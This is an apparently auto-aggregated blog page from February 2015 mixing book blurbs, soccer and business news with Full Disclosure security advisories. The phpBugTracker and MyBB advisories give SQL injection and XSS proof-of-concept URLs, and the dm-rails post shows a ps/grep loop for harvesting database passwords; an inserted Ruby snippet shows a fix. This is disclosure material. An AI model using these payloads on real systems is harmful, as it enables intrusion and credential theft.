
Saturday, February 21, 2015

Book Release: All That Remains Scarpetta 3 by Cornwell, Patricia.

With All That Remains #1 New York TimesIn Richmond, Virginia, young lovers are dying. So far, four couples in the area have disappeared, only to be found months later as mutilated corpses. When the daughter of the president's newest drug czar vanishes along with her boyfriend, Dr. Kay Scarpetta knows time is short. Following a macabre trail of evidence that ties the present homicides to a grisly crime in the past, Kay must draw upon her own personal resources to track down a murderer who is as s



Source: Baltimore County Public Library - New Books

via IFTTT

MLS Update February 21, 2015 at 02:15PM

Desert Diamond Cup Live Stream: Seattle Sounders vs. Sporting Kansas City (10 pm ET)



Two of MLS' best teams in recent years, Seattle Sounders and Sporting Kansas City, face off in the nightcap of matchday 2 of the Desert Diamond Cup on Saturday in Tucson.


The Sounders had the biggest win of the tournament's first day, blasting past hosts FC Tucson 6-0. Sporting, meanwhile, drew 2-2 against the Colorado Rapids.


You can watch the game above, which begins at 10 pm ET, live from Arizona.





from MLSsoccer.com News http://ift.tt/1D3Pafo

via IFTTT

[FD] Defense in depth -- the Microsoft way (part 29): contradicting, ambiguous, incomplete documentation

[FD] xaviershay-dm-rails v0.10.3.8 mysql credential exposure

Title: xaviershay-dm-rails v0.10.3.8 mysql credential exposure
Author: Larry W. Cashdollar, @_larry0
Date: 2015-02-17
Download Site: http://ift.tt/1FbBdvs
Vendor: Martin Gamsjaeger, Dan Kubb
Vendor Notified: 2015-02-17
Vendor Contact: notreal [at] rhnh.net

Description: This gem provides the railtie that allows datamapper to hook into rails3 and thus behave like a rails framework component. Just like activerecord does in rails, dm-rails uses the railtie API to hook into rails. The two are actually hooked into rails almost identically.

Vulnerability: The problem is with the execute function exposing the user credentials to the process table. Lines 169 - 177 in /datamapper/dm-rails/blob/master/lib/dm-rails/storage.rb:

    def execute(statement)
      system(
        'mysql',
        (username.blank? ? '' : "--user=#{username}"),
        (password.blank? ? '' : "--password=#{password}"),
        '-e', statement
      )
    end

OSVDB:118579

Exploit Code:

    $ while (true) do ps -ef |grep [p]assword; done

Advisory: http://ift.tt/1B2dBfB



Source: Gmail -> IFTTT-> Blogger
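An added example, not part of the advisory or of dm-rails: one way to keep the MySQL password out of the process table is to hand it to the client through a 0600 option file named with `--defaults-extra-file` instead of a `--password=` argument. All function names and the `runner` parameter are hypothetical, and the credentials are constructed sample values.

```ruby
require 'tempfile'

# Vulnerable shape from the advisory, reduced to argv construction:
# the password is an argv element, so any local user can read it with ps.
def argv_with_password_flag(username, password, statement)
  ['mysql',
   (username.to_s.empty? ? nil : "--user=#{username}"),
   (password.to_s.empty? ? nil : "--password=#{password}"),
   '-e', statement].compact
end

# Quote a value for a MySQL option file. Conservative subset (an assumption
# of this example): control characters and double quotes are rejected,
# because a newline would let a value inject extra options; backslashes
# are doubled.
def option_value(value)
  s = value.to_s
  if s =~ /[\x00-\x1f"]/
    raise ArgumentError, 'control character or double quote in option value'
  end
  '"' + s.gsub('\\') { '\\\\' } + '"'
end

# Write the credentials to a temporary [client] option file, yield its path,
# and delete the file afterwards. Tempfile creates the file with mode 0600.
def with_client_defaults_file(username, password)
  file = Tempfile.new(['mysql-client', '.cnf'])
  file.write("[client]\n")
  file.write("user=#{option_value(username)}\n") unless username.to_s.empty?
  file.write("password=#{option_value(password)}\n") unless password.to_s.empty?
  file.flush
  yield file.path
ensure
  file.close! if file
end

# Hardened argv: only the path of the option file appears on the command line.
# --defaults-extra-file has to be the first option given to the mysql client.
def argv_with_defaults_file(cnf_path, statement)
  ['mysql', "--defaults-extra-file=#{cnf_path}", '-e', statement]
end

# Hardened replacement for execute(statement). The runner is injectable so the
# argv can be inspected without a MySQL client installed.
def execute_hardened(username, password, statement,
                     runner: ->(argv) { system(*argv) })
  with_client_defaults_file(username, password) do |path|
    runner.call(argv_with_defaults_file(path, statement))
  end
end

# Audit helper: does any argv element contain the secret?
def argv_leaks_secret?(argv, secret)
  !secret.to_s.empty? && argv.any? { |arg| arg.include?(secret) }
end

if __FILE__ == $PROGRAM_NAME
  secret = 'constructed-secret' # constructed sample value
  show = lambda do |argv|
    puts argv.join(' ')
    true
  end
  show.call(argv_with_password_flag('app', secret, 'SELECT 1'))
  execute_hardened('app', secret, 'SELECT 1', runner: show)
end
```

The statement passed with `-e` still appears in the process table, so it must not carry secrets either.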

How weather affects what you tip the delivery guy

Winter weather conditions can cause tips for online food deliveries to jump.



from Business and financial news - CNNMoney.com http://ift.tt/1w1vE3J

via IFTTT

My debt collection horror story

Law firm Linebarger Goggan Blair & Sampson rakes in big money going after everything from unpaid parking tickets to back taxes. But many of the millions of people the firm goes after say they have been unfairly targeted. Here are three of their stories.



from Business and financial news - CNNMoney.com http://ift.tt/1G7ee5S

via IFTTT

Labor Secretary: 'Damage done' by port strike





from Business and financial news - CNNMoney.com http://ift.tt/1D3FrWb

via IFTTT

MLS Update February 21, 2015 at 01:00PM

Desert Diamond Cup Live Stream: Real Salt Lake vs. FC Tucson (8 pm ET)



The second day of Desert Diamond Cup play takes place on Saturday in Tucson, and the second match of the day pits tournament hosts FC Tucson against MLS powerhouse Real Salt Lake at 8 pm ET.





from MLSsoccer.com News http://ift.tt/1DFgpiZ

via IFTTT

MLS Update February 21, 2015 at 12:58PM

LA Galaxy head coach Bruce Arena calls European tour a "very good trip", says no decision yet on Mika Vayrynen


DUBLIN – Time is running out for MLS coaches to fine-tune their squads ahead of the new season kicking off, but Bruce Arena is relatively pleased with his situation.


Ready to return to Los Angeles after a preseason trip to Ireland and Sweden, the LA Galaxy head coach admitted that there is still some work to be done. Yet, they have made a huge amount of progress.





from MLSsoccer.com News http://ift.tt/1Agxld9

via IFTTT

Benfica comes back 3-1 at Moreirense to increase lead

LISBON, Portugal (AP) Benfica fought back for a 3-1 win at 10-man Moreirense to provisionally increase its lead of the Portuguese league on Saturday.



from FOX Sports Digital http://ift.tt/1DFaqed

via IFTTT

MLS Update February 21, 2015 at 12:13PM

Desert Diamond Cup Live Stream: Colorado Rapids vs. New England Revolution (7:30 pm ET)



The Colorado Rapids and New England Revolution will meet in matchday 2 of the Desert Diamond Cup in Tucson on Saturday, with both sides looking for their first victory in the preseason tournament.


The game, set for a 7:30 pm ET kickoff, sees the Rapids, who drew 2-2 on Wednesday with Sporting KC, take on the Revs, who lost 1-0 to Real Salt Lake, also on Wednesday.


You can watch the game above, live, as it happens from Arizona.





from MLSsoccer.com News http://ift.tt/1LoA1Y2

via IFTTT

PAOK beats Veria 3-1, stays 3rd in Greek league

ATHENS, Greece (AP) PAOK scored all of its goals in the first half and coasted to a 3-1 victory at Veria in the Greek league on Saturday.



from FOX Sports Digital http://ift.tt/1ECNMAd

via IFTTT

MLS Update February 21, 2015 at 11:42AM

FC Dallas fill a key hole in attack with the signing of versatile, fast winger Michael Barrios



In a perfect world, the signing of Michael Barrios will create a lethal, Colombian one-two punch on the wings for FC Dallas.





from MLSsoccer.com News http://ift.tt/1B1pu3S

via IFTTT

MLS Update February 21, 2015 at 11:10AM

Follow along with Day 1 of the Carolina Challenge Cup


The Carolina Challenge Cup 2015 gets underway on Saturday, and with it, two very intriguing match-ups.


First, the Houston Dynamo will square off against tournament hosts and 2015 USL affiliate club Charleston Battery, at 5 pm ET. You can check out the LIVE STREAM of the game here.





from MLSsoccer.com News http://ift.tt/1zvU7ty

via IFTTT

I have a new follower on Twitter



Susan Bennett

Susan Bennett, Voice-over Artist and Singer. Most of you know me as the voice of Siri. VOX, inc. Los Angeles, http://t.co/fPe3O1VbSy

Atlanta, GA

http://t.co/PnkYOaIKuH

Following: 82609 - Followers: 121650



February 21, 2015 at 04:20PM via Twitter http://ift.tt/1dS2fxo

Coming soon: A change in who gets overtime pay

Read full story for latest details.



from Business and financial news - CNNMoney.com http://ift.tt/1vOdFxu

via IFTTT

Super-sneaky malware found in companies worldwide

Read full story for latest details.



from Business and financial news - CNNMoney.com http://ift.tt/1FoJtMb

via IFTTT

Man City beat Newcastle 5-0, close gap to five points with Prem leaders Chelsea, who drew 1-1 vs. Burnley; Arsenal third (ESPN)

from ESPN http://m.espn.go.com/

via IFTTT

Book Release: The Secret Life of the Grown-up Brain by Strauch, Barbara

A leading science writer examines how our brains improve in middle age. Pulitzer Prize-winning science writer Barbara Strauch explores the latest findings that demonstrate how the middle-aged brain is more flexible and capable than previously thought. In fact, new research from neuroscientists and psychologists suggests that the brain reorganizes, improves in important functions, and even helps us adopt a more optimistic outlook in middle age. We recognize patterns faster, make better judgments,



Source: Baltimore County Public Library - New Books

via IFTTT

Book Release: Hardly Knew Her by Lippman, Laura

New York Times bestselling author Laura Lippman has been hailed as one of the best crime fiction writers in America today, winning virtually every major award in the genre. The author of the enormously popular series featuring Baltimore P.I. Tess Monaghan as well as three critically lauded stand-alone novels, Lippman now turns her attention to short stories — and reveals another level of mastery. Lippman sets many of the stories in this sterling anthology, Hardly Knew Her, in familiar territory



Source: Baltimore County Public Library - New Books

via IFTTT

Book Release: Benjamin Franklin by Isaacson, Walter

In this authoritative and engrossing full-scale biography, Walter Isaacson, bestselling author of Einstein and Steve Jobs, shows how the most fascinating of America's founders helped define our national character. Benjamin Franklin is the founding father who winks at us, the one who seems made of flesh rather than marble. In a sweeping narrative that follows Franklin's life from Boston to Philadelphia to London and Paris and back, Walter Isaacson chronicles the adventures of the runaway apprent



Source: Baltimore County Public Library - New Books

via IFTTT

Book Release: The Easy Vegetarian Kitchen by Alderson, Erin

Fresh, delicious vegetables should be a staple of any diet, but if you've decided that you'd like to take your Meatless Mondays to a whole new level, then it might be time to ditch the processed foods and meats and try out a vegetarian diet. Eating vegetarian doesn't have to be complicated! In fact, it can be downright scrumptious and satisfying. The Easy Vegetarian Kitchen helps you to create simple meals that will help you live a happier and healthier life. Erin Alderson, the popular voice beh



Source: Baltimore County Public Library - New Books

via IFTTT

Book Release: Storm Warning by Sue, Park, Linda

The end is near! Book 9 of the #1 NY Times Bestselling series. JOIN ANYTIME TO PLAY FOR THE CHANCE TO WIN! Throughout the hunt for the 39 Clues, Amy and Dan have encountered some of the darkest aspects of history . . . and had to deal with the role their family played. But are they ready for the truth? In this thrilling ninth installment, Amy and Dan hit the high seas as they follow the trail of some infamous ancestors to track down a long lost treasure. However, the real prize isn't hidden in a



Source: Baltimore County Public Library - New Books

via IFTTT

[FD] Type Confusion Infoleak Vulnerability in unserialize() with DateTimeZone

# Type Confusion Infoleak Vulnerability in unserialize() with DateTimeZone

Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date: 2015.1.29 - Release Date: 2015.2.20

> A Type Confusion Vulnerability was discovered in unserialize() with DateTimeZone object's __wakeup() magic method that can be abused for leaking arbitrary memory blocks.

Affected Versions



Source: Gmail -> IFTTT-> Blogger

[FD] Use After Free Vulnerability in unserialize() with DateTime* [CVE-2015-0273]

# Use After Free Vulnerability in unserialize() with DateTime* [CVE-2015-0273]

Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date: 2015.1.29 - Release Date: 2015.2.20

> A use-after-free vulnerability was discovered in unserialize() with DateTime/DateTimeZone/DateInterval/DatePeriod objects's __wakeup() magic method that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely.

Affected Versions



Source: Gmail -> IFTTT-> Blogger

[FD] Multiple SQLi-, stored/reflected XSS- and CSRF-vulnerabilities in phpBugTracker v. 1.6.0

Advisory: Multiple SQLi, stored/reflecting XSS- and CSRF-vulnerabilities in phpBugTracker v.1.6.0
Advisory ID: SROEADV-2015-16
Author: Steffen Rösemann
Affected Software: phpBugTracker v.1.6.0
Vendor URL: http://ift.tt/1zV5gTV
Vendor Status: patched
CVE-ID: will asked to be assigned after release on FullDisclosure via OSS-list
Tested on: OS X 10.10 with Firefox 35.0.1 ; Kali Linux 3.18, Iceweasel 31

==========================
Vulnerability Description:
==========================

The Issuetracker phpBugTracker v. 1.6.0 suffers from multiple SQLi-, stored/reflected XSS- and CSRF-vulnerabilities.

==================
Technical Details:
==================

The following files used in a common phpBugTracker installation suffer from different SQLi-, stored/reflected XSS- and CSRF-vulnerabilities:

===========
project.php
===========

SQL injection / underlying CSRF vulnerability in project.php via id parameter:

http://{TARGET}/admin/project.php?op=edit_component&id=1%27+and+1=2+union+select+1,2,database%28%29,user%28%29,5,6,version%28%29,8,9,10,11,12+--+

Stored XSS via input field "project name":

http://{TARGET}/admin/project.php?op=add

executed in: e.g. http://{TARGET}/admin/project.php, http://{TARGET}/index.php

========
user.php
========

Reflecting XSS in user.php via use_js parameter:

http://{TARGET}/admin/user.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&user_id=1

executed in: same page

=========
group.php
=========

Reflecting XSS in group.php via use_js parameter:

http://{TARGET}/admin/group.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&group_id=1

executed in: same page

(Blind) SQL Injection / underlying CSRF vulnerability in group.php via group_id parameter (used in different operations):

http://{TARGET}/admin/group.php?op=edit&use_js=1&group_id=1+and+SLEEP%2810%29+--+

http://{TARGET}/admin/group.php?op=edit-role&use_js=1&group_id=8+and+substring%28version%28%29,1,1%29=5+--+

==========
status.php
==========

SQL injection / underlying CSRF vulnerability in status.php via status_id parameter:

http://{TARGET}/admin/status.php?op=edit&status_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29,5+--+

Stored XSS via input field "Description":

http://{TARGET}/admin/status.php?op=edit&use_js=1&status_id=0

executed in: e.g. http://{TARGET}/admin/status.php

CSRF vulnerability in status.php (delete statuses):

==============
resolution.php
==============

SQL injection / underlying CSRF vulnerability in resolution.php via resolution_id parameter:

http://{TARGET}/admin/resolution.php?op=edit&resolution_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29+--+

CSRF vulnerability in resolution.php (delete resolutions):

============
severity.php
============

SQL injection / underlying CSRF vulnerability in severity.php via severity_id parameter:

http://{TARGET}/admin/severity.php?op=edit&severity_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29,5+--+

CSRF vulnerability in severity.php (delete severities):

Stored XSS in severity.php via input field "Description":

http://{TARGET}/admin/severity.php?op=edit&use_js=1&severity_id=0

executed in: e.g. http://{TARGET}/admin/severity.php

============
priority.php
============

SQL injection / underlying CSRF vulnerability in priority.php via priority_id parameter:

http://{TARGET}/admin/priority.php?op=edit&priority_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,4,version%28%29+--+

======
os.php
======

SQL Injection / underlying CSRF vulnerability in os.php via os_id parameter:

http://{TARGET}/admin/os.php?op=edit&os_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29+--+

CSRF vulnerability in os.php (delete operating systems):

Stored XSS vulnerability in os.php via input field "Regex":

http://{TARGET}/admin/os.php?op=edit&use_js=1&os_id=0

executed in: e.g. http://{TARGET}/admin/os.php?

============
database.php
============

SQL injection / underlying CSRF vulnerability in database.php via database_id:

http://{TARGET}/admin/database.php?op=edit&database_id=1%27+and+1=2+union+select+1,user%28%29,version%28%29+--+

CSRF vulnerability in database.php (delete databases):

Stored XSS vulnerability in database.php via input field "Name":

http://{TARGET}/admin/database.php?op=edit&use_js=1&database_id=0

========
site.php
========

CSRF vulnerability in site.php (delete sites):

SQL injection / underlying CSRF vulnerability in site.php via site_id parameter:

http://{TARGET}/admin/site.php?op=edit&site_id=5%27+and+1=2+union+select+1,version%28%29,database%28%29+--+

=======
bug.php
=======

This issue has already been assigned CVE-2004-1519, but seems to have not been corrected since the assignment:

SQL injection / underlying CSRF vulnerability in bug.php via project parameter:

http://{TARGET}/bug.php?op=add&project=1%27+and+1=2+union+select+user%28%29+--+

For details see http://ift.tt/1zV5hab.

=========
Solution:
=========

Update to version 1.7.0.

====================
Disclosure Timeline:
====================

03/05-Feb-2015 – found the vulnerabilities
05-Feb-2015 - informed the developers (see [3])
05-Feb-2015 – release date of this security advisory [without technical details]
05-Feb-2015 - forked the Github repository, to keep it available for other security researchers (see [4])
05/06-Feb-2015 - vendor replied, will provide a patch for the vulnerabilities
09-Feb-2015 - vendor provided a patch (version 1.7.0, see [3]); technical details will be released on 19th February 2015
19-Feb-2015 - release date of this security advisory
19-Feb-2015 - sent to FullDisclosure

========
Credits:
========

Vulnerabilities found and advisory written by Steffen Rösemann.

===========
References:
===========

[1] http://ift.tt/1zV5gTV
[2] http://ift.tt/18bByV4
[3] http://ift.tt/1zV5j1S
[4] http://ift.tt/18bByV8



Source: Gmail -> IFTTT-> Blogger

[FD] Multiple stored XSS-vulnerabilities in MyBB v. 1.8.3

Advisory: Stored XSS-Vulnerabilities in MyBB v. 1.8.3
Advisory ID: SROEADV-2015-15
Author: Steffen Rösemann
Affected Software: MyBB v. 1.8.3
Vendor URL: http://www.mybb.com
Vendor Status: patched
CVE-ID: -

==========================
Vulnerability Description:
==========================

MyBB v. 1.8.3 suffers from multiple stored XSS-vulnerabilities in the administrative backend.

==================
Technical Details:
==================

The stored XSS-vulnerabilities can be found in different modules in the following locations of a common MyBB installation:

================================
Module "config-attachment_types"
================================

via form-field MIME-type: http://{TARGET}/admin/index.php?module=config-attachment_types&action=add

executed in: e.g. http://{TARGET}/admin/index.php?module=config-attachment_types

======================
Module "config-mycode"
======================

via form fields "title" and "short description": http://{TARGET}/admin/index.php?module=config-mycode&action=add

executed in: e.g. http://{TARGET}/admin/index.php?module=config-mycode

=========================
Module "forum-management"
=========================

via form field "title": http://{TARGET}/admin/index.php?module=forum-management&action=add

executed in: e.g. http://{TARGET}/admin/index.php?module=forum

====================
Module "user-groups"
====================

via form fields "title" and/or "short description": http://{TARGET}/admin/index.php?module=user-groups&action=add

executed in: e.g. http://{TARGET}/admin/index.php?module=user-groups

========================
Module "style-templates"
========================

via form field "name": http://{TARGET}/admin/index.php?module=style-templates&action=add_set

executed in: e.g. http://{TARGET}/admin/index.php?module=style-templates

=======================================================
Module "style-templates" in action "add_template_group"
=======================================================

via form field "title": http://{TARGET}/admin/index.php?module=style-templates&action=add_template_group

executed in: e.g. http://{TARGET}/admin/index.php?module=style-templates&sid={TEMPLATES_NUMERIC_ID}

===================
Module "tool-tasks"
===================

via form field "title": http://{TARGET}/admin/index.php?module=tools-tasks&action=add

executed in: e.g. http://{TARGET}/admin/index.php?module=tools-adminlog

==========================
Module "config-post_icons"
==========================

via form field "name": http://{TARGET}/admin/index.php?module=config-post_icons&action=add

executed in: e.g. http://{TARGET}/admin/index.php?module=tools-adminlog

====================
Module "user-titles"
====================

via form field "title to assign": http://{TARGET}/admin/index.php?module=user-titles&action=add

executed in: e.g. http://{TARGET}/admin/index.php?module=tools-adminlog

=======================
Module "config-banning"
=======================

via form field "username": http://{TARGET}/admin/index.php?module=config-banning&type=usernames

executed in: e.g. http://{TARGET}/admin/index.php?module=tools-adminlog

=========
Solution:
=========

Upgrade to v. 1.8.4.

====================
Disclosure Timeline:
====================

02/03-Feb-2015 – found the vulnerabilities
03-Feb-2015 - informed the developers according to their security issue rules (see [3])
03-Feb-2015 – release date of this security advisory [without technical details]
03-Feb-2015 - vendor replied, issues will be patched
15-Feb-2015 - vendor released patch v. 1.8.4 (see [4])
19-Feb-2015 - release date of this security advisory
19-Feb-2015 - sent to FullDisclosure

========
Credits:
========

Vulnerability found and advisory written by Steffen Rösemann.

===========
References:
===========

[1] http://www.mybb.com
[2] http://ift.tt/1CV14ph
[3] http://ift.tt/18bysjY
[4] http://ift.tt/1CV14pl



Source: Gmail -> IFTTT-> Blogger

[FD] iTunes 12.1.1 for Windows: still outdated and VULNERABLE 3rd party libraries, still UNQUOTED and VULNERABLE pathnames C:\Program Files\...

[FD] Defense in depth -- the Microsoft way (part 28): yes, we can (create even empty, but properly quoted pathnames)

Hi @ll, in order to prevent the start of the defunct USENET news client (alias "Windows Mail") that Microsoft installs with Windows 7 and later versions of Windows as "Microsoft Outlook NewsReader", the installation of all editions of Microsoft Office 2010 which include Microsoft Outlook 2010 as well as the standalone version of the latter create the following registry entries for the "Microsoft Outlook NewsReader" with empty pathnames for the icons and in the command lines:



Source: Gmail -> IFTTT-> Blogger

[FD] Samsung iPolis XnsSdkDeviceIpInstaller.ocx ActiveX Remote Code Execution Vulnerabilities

CVE-2015-0555

Introduction
*************************************************************

There is a Buffer Overflow Vulnerability which leads to Remote Code Execution. Vulnerability is due to input validation to the API ReadConfigValue and WriteConfigValue API's in XnsSdkDeviceIpInstaller.ocx

This is different from CVE-2014-3911 as the version of iPolis 1.12.2 (latest as of 12/12/2014). CVE-2014-3911 is related to different ActiveX and on older iPolis version

Discovery Method: Fuzzing

Exploiting: It is a client side attack where attacker can host a crafted HTML web page with malicious payload and entice the victim to browse to the hosted page to compromise the victim.

Operating System: Windows 7 Ultimate N SP1

*************************************************************

Vulnerability1: Samsung_iPolis1.12.2_XnsSdkDeviceIpInstaller.ocx_ActiveX_ReadConfigValue_RemoteCodeExecution

Proof of Concept (PoC)

Samsung iPolis 1.12.x XnsSdkDeviceIpInstaller.ocx ReadConfigValue() Remote Code Execution

*************************************************************

Vulnerability2: Samsung_iPolis1.12.2_XnsSdkDeviceIpInstaller.ocx_ActiveX_WriteConfigValue_RemoteCodeExecution

Proof of Concept (PoC)

*************************************************************

CERT contacted Samsung but there wasn't any response from Samsung. Refer http://blog.disects.com for more details

Best Regards,
Praveen Darshanam



Source: Gmail -> IFTTT-> Blogger

[FD] VLC for Android beta crash

Hello,

What do you think about it? http://ift.tt/19OzfrD

VLC for Android Beta was downloaded by over 10.000.000. This file crashes this app. On VLC beta for Windows the bug is exploitable. Currently it is fixed for Windows, but Android is still vulnerable.



Source: Gmail -> IFTTT-> Blogger

[FD] New version of Hyperion PE runtime encrypter

Hi,

We just released version 1.2 of our PE encrypter, hyperion.

[ CHANGELOG ]
- added support for Windows 8 and 8.1

[ DESCR ]
Hyperion is a runtime encrypter for 32-bit portable executables. It is a reference implementation and bases on the paper "Hyperion: Implementation of a PE-Crypter".

[ LINKS ]
Tool @ http://ift.tt/19Ozfru
Papers/slides available @ http://ift.tt/1CZu9SW

cheers,
noptrix



Source: Gmail -> IFTTT-> Blogger

[FD] Easy Social Icons WordPress plugin v1.2.2 Persistent XSS and CSRF

[FD] WooCommerce WordPress plugin 2.2.10 Reflected XSS

====================================================
Product: WooCommerce WordPress plugin
Vendor: WooThemes
Tested Version: 2.2.10
Vulnerability Type: Cross-Site Scripting [CWE-79]
Risk Level: Medium
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Solved in version 2.2.11
Discovered and Provided: Eric Flokstra - ITsec Security Services
====================================================

[-] About the Vendor:

WooCommerce is a popular open source WordPress e-commerce plugin with around 6.2 million downloads. It is built by WooThemes and designed for small to large-sized online merchants.

[-] Advisory Details:

The WooCommerce plugin gives users the ability to see their stores performance from month to month using graphs and stats. However insufficient validation on the request retrieving the reports is performed, enabling remote execution of arbitrary scripting code in the target's web browser. This scripting code will be executed within the security context of the WordPress admin panel.

[-] Proof of Concept:

http://ift.tt/1MGUwCy">>

[-] Disclosure Timeline:

[28 Jan 2015]: Vendor notification
[29 Jan 2015]: Vulnerability confirmation
[29 Jan 2015]: Vulnerability patched
[19 Feb 2015]: Public disclosure

[-] Solution:

Update to version 2.2.11.

[-] References:

[1] WooCommerce Changelog



Source: Gmail -> IFTTT-> Blogger

Onion.City — Search Engine for Deep Web that Works From Normal Web Browser

There is an entire section of the Internet that you probably don’t see on a daily basis, it’s called the "Darknet" or "Deep Web", where all browsing is done anonymously. About a week ago, we reported about the 'Memex' Deep Web Search Engine, a Defense Advanced Research Projects Agency (DARPA) project to create a powerful new search engine that could find things on the deep web that isn't





from The Hacker News http://ift.tt/1AZSnNM

via IFTTT

An Evening Sky Conjunction



Eight years ago, an evening sky held this lovely pairing of a young crescent Moon and brilliant Venus. Seen near the western horizon, the close conjunction and its wintry reflection were captured from Bolu, Turkey, planet Earth on February 19, 2007. In the 8 Earth years since this photograph was taken Venus has orbited the Sun almost exactly 13 times, so the Sun and Venus have now returned to the same configuration in Earth's sky. And since every 8 years the Moon also nearly repeats its phases for a given time of year, a very similar crescent Moon-Venus conjunction will again appear in planet Earth's evening skies tonight. But the February 20, 2015 version of the conjunction will also include planet Mars. Much fainter Mars will wander even closer to Venus by the evening of February 21. via NASA http://ift.tt/17yarSS

Friday, February 20, 2015

Vidi aquam

Composer, Anonymous. Key, D major. Language, Latin. Piece Style, Classical. Instrumentation, Chorus: Sopranos, Altos, Tenors and Basses



from Google Alert - anonymous http://ift.tt/1GdJRuz

via IFTTT

MLS Update February 20, 2015 at 03:40PM

2015 Preseason Schedule | By Date










from MLSsoccer.com News http://ift.tt/1BMUdm7

via IFTTT


MLS Update February 20, 2015 at 05:11PM

Fan favorite, trialist Dane Richards will get another chance to impress for New York Red Bulls vs. OKC Energy


Could the New York Red Bulls soon be set to welcome home one of their supporters' old favorites?


After making his first appearance in a Red Bulls jersey since July 2012 in a 1-1 preseason draw against Danish side HB Koge in Bradenton, Fla. on Wednesday, winger Dane Richards will look to continue to make his case to manager Jesse Marsch on Saturday in his quest for a contract.





from MLSsoccer.com News http://ift.tt/1AWPj6z

via IFTTT

MLS Update February 20, 2015 at 03:54PM

Colorado Rapids announce signing of Argentine attacker Juan Ramirez as young Designated Player


Colorado Rapids officially announced Friday the acquisition of Argentinos Juniors midfielder Juan Ramirez, the second Designated Player in franchise history, pending the receipt of his P-1 Visa and ITC.


Per league policy, terms of the deal were not disclosed.





from MLSsoccer.com News http://ift.tt/1vQLNTE

via IFTTT

MLS Update February 20, 2015 at 03:08PM

Live Stream: Watch FC Dallas take on DC United in preseason action (8:30 pm ET)



Are you ready for more MLS preseason action on this Friday evening? You're in luck.


FC Dallas are hosting D.C. United at Toyota Stadium (8:30 pm ET). You can watch the game via the stream above if you can't make it out to the match.





from MLSsoccer.com News http://ift.tt/1FESXDm

via IFTTT

Is a prime time shakeup coming at MSNBC?

Is a prime time shakeup coming up next at MSNBC? "We have no plans to take Chris Hayes' show off the air, or move Rachel Maddow's show," a spokesperson says.



from Business and financial news - CNNMoney.com http://ift.tt/1CXx7XX

via IFTTT

MLS Update February 20, 2015 at 01:41PM

Crash course: Portland Timbers hoping new backline pieces come together to solve defensive problems


PORTLAND, Ore. – When Portland Timbers fans say hello to their team again Sunday with the start of the Simple Invitational preseason tournament at Providence Park – their first game action in the Rose City since last season – they’ll see plenty of familiar faces.


There will be, however, some new players on the field – in very important positions.





from MLSsoccer.com News http://ift.tt/1LnIe0l

via IFTTT

I have a new follower on Twitter



Inner Healing

Download Hypnosis & Subliminal MP3s - For FREE



http://t.co/SqxtK25gC6

Following: 4047 - Followers: 14566



February 20, 2015 at 07:38PM via Twitter http://ift.tt/1D9k1qa

Bill O'Reilly has some fighting words for Mother Jones

Bill O'Reilly continued to excoriate Mother Jones on Friday for a critical report on his time covering the Falklands War.



from Business and financial news - CNNMoney.com http://ift.tt/1AVD3mI

via IFTTT

Book Release: The Twelfth Card A Lincoln Rhyme Novel by Deaver, Jeffery.

Bestselling master of suspense Jeffery Deaver is back with a brand-new Lincoln Rhyme thriller. To save the life of a young girl who's being stalked by a ruthless hit man, Lincoln and his protégé, Amelia Sachs, are called upon to do the impossible: solve a truly "cold case" -- one that's 140 years old. The Twelfth Card The motive may have to do with a term paper that Geneva is writing about her ancestor, Charles Singleton, a former slave. A teacher and farmer in New York State, Charles was act



Source: Baltimore County Public Library - New Books

via IFTTT

MLS Update February 20, 2015 at 12:45PM

Former New York Red Bulls star Thierry Henry joins Arsenal as youth coach


Thierry Henry’s time away from the pitch didn’t last very long.





from MLSsoccer.com News http://ift.tt/1AVzU6C

via IFTTT

'Orange is the new Black' get hosed by the Emmys?

The Television Academy passed new rule changes that expand category field, and define comedy and dramas.



from Business and financial news - CNNMoney.com http://ift.tt/1LkC2nR

via IFTTT

Ten-man Monaco wins 1-0 at Nice in French league

NICE, France (AP) Substitute Bernardo Silva scored a late winner to give ten-man Monaco a 1-0 win at local rival Nice in the French league.



from FOX Sports Digital http://ift.tt/1LkCjaq

via IFTTT

Book Release: If Joan of Arc Had Cancer Finding Courage, Faith, and Healing from History's Most Inspirational Woman Warrior by Janet Lynn Roseman, PhD.

Reclaim Inner Strength, Courage, and Faith -- — Dr. Bernie S. Siegel, author of The Art of Healing and Love, Medicine, and Miracles -- — Ann Fonfa, president (volunteer), The Annie Appleseed Project



Source: Baltimore County Public Library - New Books

via IFTTT

Book Release: Inheriting Fear by Vaile, Sandy.

Chef Mya Jensen's plate is already full. She has her job, her motorbike, her kickboxing - and she's the guardian of her disabled mother. She doesn't need a man in her life, and she definitely doesn't need her cocky new neighbour, Detective Luca Patterson, linking her to his latest investigation. Luca has never crossed a professional line - until he meets Mya. She is sexy, feisty, and so many kinds of wrong, but he can't stop thinking about her. Maybe because every time he's onto a lead in his lat



Source: Baltimore County Public Library - New Books

via IFTTT

Book Release: Reforming Gabe by Hunter Pace, Alicia.

The world loved Heisman trophy winner and two-time Super Bowl champion Gabe Beauford - until he blew it and cost San Antonio the chance to make history. Now his brother's wedding back in Beauford Bend offers the perfect hideout. Neyland MacKenzie has a passion for jewelry making and a hatred for football. Neither is working out very well. With sales down, it's getting harder to pay the rent or buy new materials, and she can't escape the notoriety of being the daughter of the beloved Beauford high



Source: Baltimore County Public Library - New Books

via IFTTT

Book Release: A Work of Art by Maysonet, Melody.

Shy, artistic Tera can't wait to attend a prestigious art school in France to prove to her famous artist father that she can make something of herself. But Tera's hopes for the future explode when the police arrest her dad for an unspeakable crime. Her father's arrest must be a mistake, so Tera goes into action, sacrificing her future at art school to pay for his defense. Meanwhile, she falls head over heels for Joey, a rebel musician who makes her feel wanted and asks no questions about her pas



Source: Baltimore County Public Library - New Books

via IFTTT

